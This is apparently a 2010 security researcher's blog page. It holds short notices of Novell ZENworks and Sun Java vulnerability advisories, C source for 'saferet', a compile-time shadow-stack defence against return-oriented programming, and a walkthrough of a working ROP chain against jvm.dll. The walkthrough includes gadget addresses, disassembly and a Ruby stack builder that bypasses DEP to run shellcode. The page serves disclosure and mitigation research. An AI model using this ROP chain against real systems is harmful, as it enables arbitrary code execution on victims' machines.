Tuesday, 27 April 2010

Novell ZENworks UploadServlet Remote Code Execution Vulnerability

TippingPoint's Zero Day Initiative (ZDI) have published an advisory for a remote pre authentication arbitrary file upload vulnerability in Novell ZENworks Configuration Management which leads to arbitrary code execution. This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:

Friday, 16 April 2010

A little return oriented exploitation on Windows x86 (Part 2)

In part 1 of this blog post I showed a simple return oriented attack which utilized some ROP in order to bypass permanent DEP and execute arbitrary code. The rest of this post will look at an experimental compiler convention (currently dubbed saferet) that aims to mitigate such return oriented attacks.

The technique itself is built around the commonly used concept of using a shadow stack to maintain, at run time, a list of valid return addresses for each thread. The first example I know of for using a shadow stack is Stack Shield by Vendicator circa 2000 to mitigate stack based buffer overflows. More recent work has been done for ROP specific mitigation's, which include the Transparent Runtime Shadow Stack (TRUSS) by Saravanan Sinnadurai, Qin Zhao, and Weng-Fai Wong in 2008 and a more recent effort called ROPdefender by Lucas Davi, Ahmad-Reza Sadeghi and Marcel Winandy in 2010. Both TRUSS and ROPdefender use a shadow stack system and run time binary instrumentation to monitor the control flow of a thread. saferet differs from the above, apart from being a compile time solution, by relying on the exception handling features of the Windows OS to ensure the integrity of a threads call stack.

saferet maintains a unique shadow stack, containing both the return address and current stack pointer, for each thread of execution by modifying the function prolog of all functions at compile time to perform a call to saferet_prolog(). The saferet prolog will overwrite the real return address on the stack with a cookie value at run time. We also modify at compile time how a RET instruction is performed, as a return instruction is the most common way (albeit not the only way) to create gadgets for use in a ROP attack. By inserting a HLT instruction (HLT being a privileged instruction which does not effect any EFLAGS) before every RET instruction we can ensure that an exception will be generated before any attempt to return to an address on the stack (remembering that due to saferet_prolog() the actual return address is no longer present on the stack). By providing an exception handler, called saferet_handler(), we can verify at run time that the return address has not been modified and that the stack pointer is as expected, before allowing execution to continue to return to the expected return address as previously recorded on the shadow stack.

We can see below an example of a simple function compiled with and without the saferet convention with the modification highlighted in red.

push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+12]
add eax, ecx
mov esp, ebp
pop ebp

push esp
call saferet_prolog
push ebp
mov ebp, esp
mov eax, [ebp+8]
mov ecx, [ebp+12]
add eax, ecx
mov esp, ebp
pop ebp

The size overhead for every function compiled with the saferet convention is an extra 7 bytes. The basic operation of the saferet convention is shown in the diagram below.

If the saferet_handler detects a return violation the process can be terminated. If no return violation has been detected the saferet_handler will restore the expected return address to the stack and then allow execution to proceed to the intended return instruction. The Vectored Exception Handler mechanism present in Windows OS is used to register the saferet_handler. This provides us with a process wide exception filter and has a number of advantages over stack based Structured Exception Handlers. Specifically, Microsoft's /GS protection has a weakness that allows (during a stack based buffer overflow) an attacker to gain EIP control via an overwritten Structured Exception Handler on the stack even if the GS stack cookie has been overwritten, saferet avoids this as the saferet_handler is able to detect the return violation before the SEH chain on the stack is processed, even if the attacker triggers an access violation by writing past the end of the allocated stack memory. This is possible because Vectored Exception Handlers are processed before Structured Exception Handlers. ROP attacks are mitigated by reducing the number of function tails that can be used as gadgets in a ROP attack, although ret2libc style attacks which call the whole function (and do not use gadgets) would not be mitigated.

A number of caveats exist with this technique:

  • This is a compile time mitigation and as such all code for a module must be recompiled to take advantage, unlike run time mitigation's that use binary instrumentation.
  • The return instruction itself is not prevented from use by an attacker in a ROP attack, neither is the tail end of the saferet_handler, as the saferet_handler function cannot protect itself (unlike the saferet_prolog which can).
  • Due to an exception (technically two exceptions, see the source below) being generated for every call, a major performance hit is encountered due to the transition into kernel mode in order to process the exception and give our user mode exception handler control. Some changes at an OS level could help optimize this, for example a designated handler to only process saferet exceptions in order to avoid some overhead.

The implementation itself is relatively simple and is composed of two separate functions as mentioned previously. A little more work is needed on the compiler side in order to support the saferet convention. I have modified the open source TinyC Compiler (TCC) (Written by Fabrice Bellard, Licensed under LGPL) to support saferet as a proof of concept. The saferet_prolog() function is as follows:

* The global TLS index we use to make this all thread safe.
DWORD tls = 0;

* The global heap we use for all SAFERET releated allocations.

* This is the function prolog which is used by the compiler for each function
* to be protected with SAFERET
* __sr_prolog__ uses the __stdcall calling convention and places a HLT instruction
* before all RET/RETN instructions, however it does not insert a call to saferet_prolog
* as this would introduce a recusive loop, instead we can mimic the results of a
* call to saferet_prolog from within saferet_prolog itself.
VOID __declspec(__sr_prolog__) saferet_prolog( DWORD esp )
register THREADINFO * thread;

// for now just sanity check ESP has a value, but we should probably check this for a valid read/write address
if( !esp )

// if this is the first time this thread has called saferet_prolog we create the TLS
if( !tls )
// get a TLS index to store this threads THREADINFO structure
tls = TlsAlloc();
if( tls == TLS_OUT_OF_INDEXES )
// if we dont have a process wide SAFERET heap yet, create one...
if( !heap )
heap = HeapCreate( HEAP_GENERATE_EXCEPTIONS, 0, 0 );
// and register the process wide vectored exception handler
AddVectoredExceptionHandler( 1, &saferet_handler );

// grab this threads THREADINFO structure and if one doesnt exist create it
thread = TlsGetValue( tls );
if( !thread )

QueryPerformanceCounter( &counter );


thread->index = 0;
thread->total = RECORDS;

// set a simple cookie value for this thread.
thread->cookie = GetTickCount() ^ GetCurrentProcessId() ^ GetCurrentThreadId() ^ counter.LowPart;

// set this threads THREADINFO structure with our tls index
if( !TlsSetValue( tls, thread ) )

// push a new record into our record stack for the callee's caller
thread->records[ thread->index ].ret = *(DWORD *)esp;
thread->records[ thread->index++ ].esp = esp;
// patch over the real return address with this threads cookie
*(DWORD *)esp = thread->cookie;

// modify the ESP value to point to the return value for this call to saferet_prolog
esp -= 8;

// push a new record into our record stack for the call to saferet_prolog
thread->records[ thread->index ].ret = *(DWORD *)esp;
thread->records[ thread->index++ ].esp = esp;
// patch over the real return address with this threads cookie
*(DWORD *)esp = thread->cookie;

// if we need to we grow the record stack
if( thread->index >= thread->total )
thread->total += RECORDS;
thread = (THREADINFO *)HeapReAlloc( heap, HEAP_GENERATE_EXCEPTIONS|HEAP_ZERO_MEMORY, thread, sizeof(THREADINFO)+(sizeof(RECORD)*thread->total) );
TlsSetValue( tls, thread );

And the saferet_handler() is as follows:

* This is the exception handler used by SAFERET to filter all exceptions raised by a process.
* __sr_handler__ uses the __stdcall calling convention and is intended to be used by the
* saferet_handler function. This function has to opt out of the saferet convention itself.
LONG __declspec(__sr_handler__) saferet_handler( EXCEPTION_POINTERS * Exception )
register THREADINFO * thread;
register DWORD esp;

// Get the info structure for this thread
thread = TlsGetValue( tls );

// Get the esp value for the last record
esp = thread->records[ thread->index-1 ].esp;

// Test if the cookie we wrote to the stack via saferet_prolog() is still present.
// We do the test here (as opposed to soley during an exception from a HLT instruction)
// as saferet_handler may be called during a access violation and not just upon a
// desired HLT/RET. This lets us detect a return violation before passing control to a
// structured exception handler which, as the SEH chain is also stored on the stack, may
// have been overwritten, allowing the attacker to gain EIP control. As our handler is a
// vectored exception handler, we are given the access violation to process before the
// (potentially corrupted) SEH chain gets a chance to process it.
if( *(DWORD *)(esp) != thread->cookie )
char message[1024];
char program[MAX_PATH];
GetModuleFileName( NULL, program, MAX_PATH );
snprintf( message, 1024, "The return address 0x%08X located at 0x%08X does not match the cookie 0x%08X.\n\nThis process will be terminated.\n\nEIP:0x%08X, Exception:0x%08X, Process:%d, Thread:%d\nFile:%s\n", *(DWORD *)(esp), esp, thread->cookie, Exception->ContextRecord->Eip, Exception->ExceptionRecord->ExceptionCode, GetCurrentProcessId(), GetCurrentThreadId(), program );
MessageBoxA( NULL, message, "Return Violation!", MB_OK|MB_ICONEXCLAMATION );
ExitProcess( -1 );

// Check if we are processing an exception generated via a privileged instruction
if( Exception->ExceptionRecord->ExceptionCode == EXCEPTION_PRIV_INSTRUCTION )
// And only process 'HLT' instructions (We could also check here
// if the next instruction is indeed a RET or RETN instruction).
if( *(BYTE *)(Exception->ContextRecord->Eip) == HALT_OPCODE )
// If we are returning to an address from a different ESP we can signal a return violation.
// We will allready have checked the cookie value (above) if ESP is correct.
if( esp != Exception->ContextRecord->Esp )
char message[1024];
char program[MAX_PATH];
GetModuleFileName( NULL, program, MAX_PATH );
snprintf( message, 1024, "The stack pointer 0x%08X does not match the expected stack pointer 0x%08X.\n\nThis process will be terminated.\n\nEIP:0x%08X, Exception:0x%08X, Process:%d, Thread:%d\nFile:%s\n", Exception->ContextRecord->Esp, esp, Exception->ContextRecord->Eip, Exception->ExceptionRecord->ExceptionCode, GetCurrentProcessId(), GetCurrentThreadId(), program );
MessageBoxA( NULL, message, "Return Violation!", MB_OK|MB_ICONEXCLAMATION );
ExitProcess( -1 );

// Patch in the real return address and pop it off the threads record list
*(DWORD *)(Exception->ContextRecord->Esp) = thread->records[ --thread->index ].ret;

// Advance execution past the 'HLT' instruction
Exception->ContextRecord->Eip += sizeof(BYTE);

// Continue execution and allow the return to the real return address

// If we get here we allow the remaining vectored exception handlers to process this
// exception (if any present) before handing the exception off to be processed by the
// threads current SEH chain before finally ending with the unhandled exception filter.

The modified version of TCC can be downloaded here, which includes several simple applications (namely 'hanoi.exe', 'overflow_test.exe' and 'overflow_seh.exe') to see saferet in action: tcc-0.9.25-saferet.zip. The examples can be compiled with TCC using saferet via the -SR switch, e.g. "tcc -SR .\win32\examples\overflow_seh.c". If you want to rebuild TCC from source you will need to use MinGW.

Monday, 12 April 2010

A little return oriented exploitation on Windows x86 (Part 1)

This post will take a look at how Return Oriented Programming (ROP) can be used on x86 Windows in order to bypass DEP and gain arbitrary code execution. The example I will use is from an exploit I wrote last year for a stack based buffer overflow I found in the Sun Java Virtual Machine which was recently patched and disclosed by TippingPoint's ZDI. (ZDI-10-061). Part 2 of this blog post will look at an experimental compiler convention that aims to mitigate return oriented attacks such as the one presented here.

It should be noted that a ROP attack against the JVM is not wholly required due to the JVM employing an executable heap, allowing an attacker to easily circumvent DEP and ASLR through heap spraying with a high degree of reliability, however it still makes for an interesting case study.

Getting Our Bearings
The cmm!readMabCurveData bug (which I wont be discussing specifically in this post) is a vanilla stack based buffer overflow vulnerability whereby we end up gaining EIP control via an overwritten return address and we control a large portion of data on the stack, pointed to by ESP. ESI will also be pointing near our shellcode buffer which has been placed on the stack.

Assuming ASLR is in place we need to locate the address of a suitable image(s) in memory so as we can begin to create some gadgets. Conveniently the JVM applies no relocation to most of its modules, so we can use static base addresses for most of the modules used. In other scenarios we would need to leverage a memory leak, or similar, in order to first discover a suitable module's address in memory.

The Plan
We will execute the following pseudo C code via several gadgets in order to bypass DEP and execute shellcode:

// we start with a pointer that is near-ish our shellcode (held in ESI at the time we get control)
extern BYTE * pNonExecutableShellcode;
// first we will modify this pointer to point into our shellcode buffer
pNonExecutableShellcode -= 8192;
// we will then proceed to allocate some read/write/executable memory...
pExecutableMemory = VirtualAlloc( 0, 0x4000, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// and then copy our shellcode into this executable memory...
memmove( pExecutableMemory, pNonExecutableShellcode, 0x3000 );
// finally we can execute the shellcode...

In total it will take 10 gadgets to perform the above.

The Gadgets
We pick the module jvm.dll (version 1.6.0_14 at the original time of writing) which has a fixed base address of 0x6D800000 and will not be relocated.

First we calculate a pointer to the shellcode on the stack...

// (1) when we first return we must remove 3 DWORD's from stack (previous stack frames parameters which were altered)
0x6D8011AC: add esp, 12
0x6D8011AF: ret

// (2) get in some needed registers...
// ESI = pointer to stack just below shellcode
0x6D8FF623: mov edx, esi // save ESI into EDX for later
0x6D8FF625: pop esi // (2.A) unused
0x6D8FF626: mov eax, ebx
0x6D8FF628: pop ebx // (2.B) unused
0x6D8FF629: pop ebp // (2.C) unused
0x6D8FF62A: retn 12

// (3) set ECX to the stack adjust size
0x6D81BDD7: pop ecx // (3.A) 0x00002000
0x6D81BDD8: ret

// (4) set EDI = address where we save the shellcode address
0x6D802A88: pop edi // (4.A) 0x6DA612CC
0x6D802A89: ret

// (5) sub EDX, ECX to point to the shellcode buffer...
// ECX = size: 8192
// EDX = pointer to stack below shellcode (around ESP)
// EDI = writeable address
0x6D97ED06: sub edx, ecx // calculate address of shellcode
0x6D97ED08: mov [edi], edx // save it for later
0x6D97ED0A: pop edi // (5.A) unused
0x6D97ED0B: pop esi // (5.B) unused
0x6D97ED0C: pop ebp // (5.C) unused
0x6D97ED0D: retn 12

Now we VirtualAlloc a RWX buffer...

// (6) we just call a whole function here, ret2libc style...
0x6D970A50: push ebp
0x6D970A51: mov ebp, esp
0x6D970A53: mov eax, [ebp+12] // (6.B) allocation size: 0x00004000
0x6D970A56: test eax, eax
0x6D970A58: jnz short 0x6D970A5E
0x6D970A5A: mov al, 1
0x6D970A5C: pop ebp
0x6D970A5D: retn
0x6D970A5E: push 0x40 // PAGE_EXECUTE_READWRITE
0x6D970A60: push 0x1000 // MEM_COMMIT
0x6D970A65: push eax
0x6D970A66: mov eax, [ebp+8] // (6.A) allocation address: 0x00000000
0x6D970A69: push eax
0x6D970A6A: call VirtualAlloc
0x6D970A70: test eax, eax
0x6D970A72: setnz al
0x6D970A75: pop ebp
0x6D970A76: ret

// (7) reuse gadget 1 and advance past the two arguments used for the above function call in gadget 6
0x6D8011AC: add esp, 12
0x6D8011AF: ret

Now we memmove the shellcode into the new RWX buffer...

// (8) move the new RWX buffer EAX into ECX for the upcoming memmove...
0x6D824C7C: mov ecx, eax
0x6D824C7E: mov eax, [ecx+20]
0x6D824C81: add esp, 4
0x6D824C84: add eax, ecx
0x6D824C86: pop ebp
0x6D824C87: ret

// (9) set EAX to our shellcode buffer on stack, which we stored in gadget 5
0x6D808150: mov eax, dword ptr [0x6DA612CC]
0x6D808155: retn 8

// (10) perform the memmove, returning the destination buffer in EAX
// the memmove size amount is a param we have already placed on stack.
0x6D85A181: push eax // the source address (shellcode on stack)
0x6D85A182: push ecx // the destination address (new RWX buffer)
0x6D85A183: call memmove // memmove returns the dest address in EAX
0x6D85A189: add esp, 12
0x6D85A18C: pop ebp // (10.A) unused
0x6D85A18D: ret

Finally we can execute the shellcode...

// (11) EAX is the RWX shellcode buffer so jump into it...
0x6D96FA23: jmp eax

The Call Stack
Using the above we construct a call stack which includes the return addresses, parameters and padding bytes as shown below in Ruby:

# when we get EIP control we use this...
eip = [0x6D8011AC].pack('V') # (1) return to stack fix up

# prior to the stack fix up, ESP will point to this...
# (the first 3 dwords are parameters from the last function call)
rop = [0x00000000].pack('V') # null to avoid crashing
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6DA612CC].pack('V') # writeable memory to avoid crashing
rop << [0x6D8FF623].pack('V') # (2) return to register load
rop << [0xAAAAAAAA].pack('V') # (2.A) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (2.B) EBX, unused
rop << [0xAAAAAAAA].pack('V') # (2.C) EBP, unused
rop << [0x6D81BDD7].pack('V') # (3)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00002000].pack('V') # (3.A) ECX, subtract from EDX to point to shellcode
rop << [0x6D802A88].pack('V') # (4)
rop << [0x6DA612CC].pack('V') # (4.A) EDI, address to save shellcode pointer
rop << [0x6D97ED06].pack('V') # (5)
rop << [0xAAAAAAAA].pack('V') # (5.A) EDI, unused
rop << [0xAAAAAAAA].pack('V') # (5.B) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (5.C) EBP, unused
rop << [0x6D970A50].pack('V') # (6)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D8011AC].pack('V') # (7)
rop << [0x00000000].pack('V') # (6.A) null to alloc anywhere
rop << [0x00004000].pack('V') # (6.B) alloc_size
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D824C7C].pack('V') # (8)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D808150].pack('V') # (9)
rop << [0x6D85A181].pack('V') # (10)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00003000].pack('V') # memmove size (<= alloc_size - 1)
rop << [0xAAAAAAAA].pack('V') # (10.A) unused
rop << [0x6D96FA23].pack('V') # (11) exec shellcode

In this particular example, exploitation would have been harder if first the /GS compiler switch had been used (assuming Visual Studio is being used for compilation) as we would not have been able to gain initial EIP control via the overwritten return address. However due to a limitation in the /GS protection we would still be able to get EIP control via an overwritten structured exception handler. Had /DYNAMICBASE been employed for the jvm.dll module (and all other modules loaded in the target process) we would not be able to rely on the static addresses used above. Instead we would need to determine at run time the base address of the jvm.dll before constructing the ROP call stack.

Next week part 2 of this post will look at a simple compile time convention I have been experimenting with to help mitigate return oriented attacks.

Tuesday, 6 April 2010

Sun Java CMM readMabCurveData Stack Buffer Overflow Vulnerability

TippingPoint's Zero Day Initiative (ZDI) have published an advisory for a stack based buffer overflow vulnerability in Sun Microsystems (A subsidiary of Oracle) Java. The flaw is found within the readMabCurveData function in the CMM module. The vulnerability effects all version of Java on Windows, Linux and Solaris over the last 5 years on both the x86 and x64 architectures. The Mac OSX Java build is also effected.

The vulnerability can be exploited by an attacker through a malicious Java applet embedded in a web page and leads to arbitrary code execution in the context of the user who visits the web page. Due to this vulnerability being a stack buffer overflow, reliable exploitation is trivial and mitigation's such as DEP and ASLR can easily be bypassed thanks to the Java Virtual Machine's heap being executable as well as maintaining a predictable layout.

This vulnerability was discovered by Stephen Fewer of Harmony Security.

You can read the full ZDI advisory here:

You can read the full Oracle advisory here: